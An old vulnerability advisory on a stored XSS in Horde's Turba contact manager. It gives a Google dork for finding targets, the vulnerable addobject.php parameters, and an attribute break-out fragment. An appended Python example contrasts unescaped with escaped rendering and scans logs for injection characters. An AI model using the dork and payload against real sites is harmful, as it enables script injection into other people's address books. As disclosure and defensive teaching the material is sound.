+==========================================================================+
+ Horde & Turba Contact Manager & XSS Vulnerabilities +
+==========================================================================+
Author(s): Ivan Sanchez
Product: Turba Contact Manager
Web: http://www.horde.org
Versions: Horde & Turba Contact Manager
Date: 13/05/2008
Turba is the Horde contact management application. It is a production-level
address book and makes heavy use of the Horde framework to provide integration
with IMP and other Horde applications.
GOOGLE DORKS:
------------
inurl:"addobject.php?"
Evil Function:
--------------
http://www.site/horde2/turba/addobject.php?
Advanced Search: inside the form, put the evil code into the (name / e-mail) form fields.
Internal Variables:
-------------------
object%5Bemail%5D   (object[email])
object%5Btitle%5D   (object[title])
First EXPLOIT:
--------------
Insert the evil code into these variables, then run the exploit!!!
1- object%5Bemail%5D=">
2- object%5Btitle%5D=">
Second EXPLOIT:
--------------
Then, when you view your contact addresses, you will see the injected XSS code there.
If you click on them, the exploit fires again!!!!
http://www.site/horde2/turba/browse.php
The stored evil script runs again!!!!
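The two issues above are a stored XSS: a value submitted through addobject.php's object[...] fields is saved and later written into browse.php's HTML without escaping, so a `">` breaks out of the attribute it is placed in. The following is an added example, not Horde or Turba code, showing the vulnerable rendering pattern beside its escaped form and a simple detection pass over constructed web-server log lines. The contact record, the log lines, the `<i>injected</i>` marker and the function names are all assumptions made for this illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Constructed contact record: the title field carries the advisory's `">`
# attribute break-out followed by harmless markup so the effect is visible.
SAMPLE_CONTACT = {
    "name": "Alice Example",
    "email": "alice@example.invalid",
    "title": '"><i>injected</i>',
}

# Matches the start of any HTML tag, opening or closing.
TAG_RE = re.compile(r"<[A-Za-z/]")


def render_contact_unsafe(contact):
    """Vulnerable pattern: stored values are concatenated into HTML unescaped,
    so a `">` in the title closes the attribute and the rest becomes markup."""
    return (
        f'<a href="mailto:{contact["email"]}" title="{contact["title"]}">'
        f'{contact["name"]}</a>'
    )


def render_contact_safe(contact):
    """Hardened pattern: every stored value is HTML-escaped at output time,
    quotes included, so it can never leave its attribute or text node."""
    def e(value):
        return html.escape(value, quote=True)
    return (
        f'<a href="mailto:{e(contact["email"])}" title="{e(contact["title"])}">'
        f'{e(contact["name"])}</a>'
    )


def count_tags(rendered):
    """Number of tags in the output; a single contact link should yield two
    (<a> and </a>), anything more means stored data became markup."""
    return len(TAG_RE.findall(rendered))


# Constructed access-log lines (combined log format): one benign submission and
# one that carries the URL-encoded `"><i>injected</i>` in object[email].
SAMPLE_LOG = """\
10.0.0.5 - - [13/May/2008:10:01:02 +0000] "GET /horde2/turba/addobject.php?object%5Bname%5D=Alice&object%5Bemail%5D=alice%40example.invalid HTTP/1.1" 200 512
10.0.0.9 - - [13/May/2008:10:02:17 +0000] "GET /horde2/turba/addobject.php?object%5Bname%5D=x&object%5Bemail%5D=%22%3E%3Ci%3Einjected%3C%2Fi%3E HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')
# Characters that have no business in a contact name, title or e-mail address.
SUSPICIOUS_RE = re.compile(r'["<>]')


def flag_turba_submissions(log_text):
    """Return (client_ip, parameter) pairs for addobject.php requests whose
    object[...] parameters contain quote or angle-bracket characters."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlparse(match.group("path"))
        if not url.path.endswith("/turba/addobject.php"):
            continue
        # parse_qs decodes %5B/%5D in the keys, giving e.g. "object[email]".
        params = parse_qs(url.query, keep_blank_values=True)
        for key, values in params.items():
            if key.startswith("object[") and any(SUSPICIOUS_RE.search(v) for v in values):
                hits.append((line.split()[0], key))
    return hits


if __name__ == "__main__":
    print("unsafe:", render_contact_unsafe(SAMPLE_CONTACT))
    print("safe:  ", render_contact_safe(SAMPLE_CONTACT))
    print("flagged:", flag_turba_submissions(SAMPLE_LOG))
```

The log check only sees the GET form shown in the advisory; a contact added through a POSTed form never puts its fields in the access log, so request-body logging or a web application firewall rule is needed to catch that path. The fix that actually removes the bug is the output-time escaping in render_contact_safe; input filtering alone leaves every already-stored record exploitable.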
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!